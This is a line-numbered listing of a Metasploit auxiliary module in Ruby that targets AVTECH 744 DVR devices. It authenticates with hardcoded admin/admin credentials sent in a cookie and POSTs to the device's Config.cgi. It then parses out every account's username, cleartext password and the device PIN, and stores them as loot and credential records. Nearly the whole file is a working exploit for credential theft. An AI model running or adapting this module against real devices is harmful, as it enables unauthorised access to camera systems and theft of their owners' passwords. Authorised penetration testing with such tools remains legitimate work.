Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'AVTECH 744 DVR Account Information Retrieval',
13
      'Description'    => %q{
14
        This module will extract the account information from the AVTECH 744 DVR devices,
15
        including usernames, cleartext passwords, and the device PIN, along with
16
        a few other miscellaneous details. In order to extract the information, hardcoded
17
        credentials admin/admin are used. These credentials can't be changed from the device
18
        console UI nor from the web UI.
19
      },
20
      'Author'         => [ 'nstarke' ],
21
      'License'        => MSF_LICENSE
22
    ))
23
  end
24

25

26
  def run
27
    res = send_request_cgi({
28
      'method' => 'POST',
29
      'uri' => '/cgi-bin/user/Config.cgi',
30
      'cookie' => "SSID=#{Rex::Text.encode_base64('admin:admin')};",
31
      'vars_post' => {
32
        'action' => 'get',
33
        'category' => 'Account.*'
34
      }
35
    })
36

37
    unless res
38
      fail_with(Failure::Unreachable, 'No response received from the target')
39
    end
40

41
    unless res.code == 200
42
      fail_with(Failure::Unknown, 'An unknown error occurred')
43
    end
44

45
    raw_collection = extract_data(res.body)
46
    extract_creds(raw_collection)
47

48
    p = store_loot('avtech744.dvr.accounts', 'text/plain', rhost, res.body)
49
    print_good("avtech744.dvr.accounts stored in #{p}")
50
  end
51

52
  def extract_data(body)
53
    raw_collection = []
54
    body.each_line do |line|
55
      key, value = line.split('=')
56
      if key && value
57
        _, second, third = key.split('.')
58
        if third
59
          index = second.slice(second.length - 1).to_i
60
          raw_collection[index] = raw_collection[index] ||= {}
61
          case third
62
          when 'Username'
63
            raw_collection[index][:username] = value.strip!
64
          when 'Password'
65
            raw_collection[index][:password] = value.strip!
66
          end
67
        elsif second.include?('Password')
68
          print_good("PIN Retrieved: #{key} - #{value.strip!}")
69
        end
70
      end
71
    end
72

73
    raw_collection
74
  end
75

76
  def extract_creds(raw_collection)
77
    raw_collection.each do |raw|
78
      unless raw
79
        next
80
      end
81

82
      service_data = {
83
        address: rhost,
84
        port: rport,
85
        service_name: 'http',
86
        protocol: 'tcp',
87
        workspace_id: myworkspace_id
88
      }
89

90
      credential_data = {
91
        module_fullname: self.fullname,
92
        origin_type: :service,
93
        private_data: raw[:password],
94
        private_type: :password,
95
        username: raw[:username]
96
      }
97

98
      credential_data.merge!(service_data)
99

100
      credential_core = create_credential(credential_data)
101

102
      login_data = {
103
        core: credential_core,
104
        status: Metasploit::Model::Login::Status::UNTRIED
105
      }
106

107
      login_data.merge!(service_data)
108

109
      create_credential_login(login_data)
110
    end
111
  end
112
end
113

114